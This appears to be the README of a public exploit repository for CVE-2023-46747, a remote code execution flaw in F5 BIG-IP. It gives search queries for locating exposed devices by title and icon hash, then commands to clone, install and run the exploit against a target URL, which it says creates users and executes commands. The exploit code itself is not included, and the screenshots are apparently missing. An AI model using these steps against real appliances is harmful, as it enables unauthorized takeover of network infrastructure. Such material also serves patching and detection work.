
Exploit for CVE-2023-46747, a remote code execution vulnerability in F5 BIG-IP, allowing unauthorized user creation and command execution.
(title="BIG-IP®" || icon_hash="-335242539")
title:"BIG-IP®"
https://my.f5.com/manage/s/article/K000137353
At this time, the user here is only admin:

Execute the script:
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890
Successfully executed command:


Exploitation fails in some versions, reference: https://twitter.com/joel_land/status/1729147886615818732.
You can use this script https://github.com/BishopFox/bigip-scanner to collect F5 BIG-IP version information. It's great!